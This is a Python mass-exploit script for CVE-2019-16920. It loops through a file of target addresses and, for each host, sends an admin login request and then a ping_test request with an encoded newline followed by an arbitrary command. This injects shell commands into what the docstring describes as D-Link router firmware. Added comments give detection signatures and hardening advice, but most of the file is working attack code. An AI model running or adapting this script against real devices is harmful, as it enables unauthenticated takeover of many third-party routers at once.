POC / CVE-2019-16920-MassPwn3r.py PY
from socket import *
import threading
import time
import sys

# Command-line inputs, read at module level (this runs on import, not only from main()).
#   argv[1]: path to a text file with one target address per line
#   argv[2]: TCP port of the device web interface (kept as a string, cast to int at connect time)
#   argv[3]: string appended verbatim to the ping_ipaddr form field of the second request
try:
	info = open(str(sys.argv[1]),'r').readlines()
	port = sys.argv[2]
	cmd = sys.argv[3]
# NOTE(review): the bare except reports every failure as a usage error, including a
# missing or unreadable list file; the handle returned by open() is never closed explicitly.
except:
	print("[*]Usage Mass_CVE-2019-16920_Exploit.py ip_list port command")
	sys.exit()

class exploiter(threading.Thread):
	"""Thread that sends two fixed HTTP POST requests to one host's /apply_sec.cgi.

	The second request places an encoded newline plus the module-level ``cmd``
	string in the ``ping_ipaddr`` field of the ``ping_test`` action, which is the
	input the file name associates with CVE-2019-16920 (publicly documented as
	unauthenticated command injection in D-Link router firmware -- verify the
	affected models against the vendor advisory).

	Defender notes: the request templates below are constant apart from the
	Host/Referer values and the appended string, so their static parts are
	usable as log or IDS signatures. Keeping the device management interface
	unreachable from untrusted networks removes the exposure this script
	depends on.
	"""
	def __init__(self, ip):
		"""Store the target address, dropping the trailing newline left by readlines()."""
		threading.Thread.__init__(self)
		self.ip = str(ip).rstrip('\n')
	def run(self):
		"""Build both requests, open one TCP connection and write them back to back.

		No response is read, so the script never learns whether the device
		accepted either request; a logged request is not proof of compromise.
		Every exception is swallowed by the outer handler.
		"""
		try:	# study requests to create your payloads
			host = self.ip
			# Request 1: POST /apply_sec.cgi, action=do_graph_auth, empty log_pass;
			# login_name is the URL-encoded base64 of "admin".
			# Detection: the Firefox/69.0 Windows User-Agent and session_id=62384 are
			# identical for every target this script touches.
			auth = "POST /apply_sec.cgi HTTP/1.1\r\nHost: " + host + ":" + port + "\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 142\r\nConnection: close\r\nReferer: http://" + host + ":" + port + "/\r\nUpgrade-Insecure-Requests: 1\r\n\r\nhtml_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384"
			# Request 2: POST /apply_sec.cgi, action=ping_test; ping_ipaddr is
			# "127.0.0.1" followed by %0a and the caller-supplied string.
			# Detection: a ping_ipaddr value containing %0a or any non-address
			# characters on this endpoint is worth alerting on; the fixed
			# "Cookie: uid=1234123" and the vi-VN Accept-Language are further
			# script-specific markers.
			execution = "POST /apply_sec.cgi HTTP/1.1\r\nHost: " + host + ":" + port + "\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 131\r\nConnection: close\r\nReferer: http://" + host + ":" + port + "/login_pic.asp\r\nCookie: uid=1234123\r\nUpgrade-Insecure-Requests: 1\r\n\r\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a" + cmd


			# Plain TCP socket (no TLS) with a 10 second timeout.
			sock = socket(AF_INET, SOCK_STREAM)
			sock.settimeout(10)
			try:
				sock.connect((host, int(port)))
				print("[*]Exploiting: ", host)
			except:
				# A failed connect is only reported; control still falls through to
				# sendall(), whose error is then swallowed by the outer handler.
				print("[!]Unable to connect to host")

			# Both requests are written on the same connection without waiting for
			# or reading any reply.
			sock.sendall(auth.encode())
			sock.sendall(execution.encode())
			sock.close()
		except:
			# Any failure (bad address, timeout, reset) is silently discarded.
			pass

def main():
	"""Start one exploiter thread per line of the target list.

	Threads are started roughly 10 ms apart, are never joined, and have no
	concurrency cap. On the network this appears as a burst of short-lived
	outbound TCP connections from one source to the same port on many
	addresses, which is a useful pattern for egress or NetFlow alerting.
	"""
	for ip in info:
		try:
			# Small fixed delay between thread starts.
			time.sleep(0.01)
			exploiter(ip).start()
		except:
			# A thread that cannot be started is skipped without any message.
			pass

# Script entry point. The argv parsing at the top of the file is not behind this
# guard, so importing the module still reads sys.argv and may exit.
if __name__ == '__main__':
	main()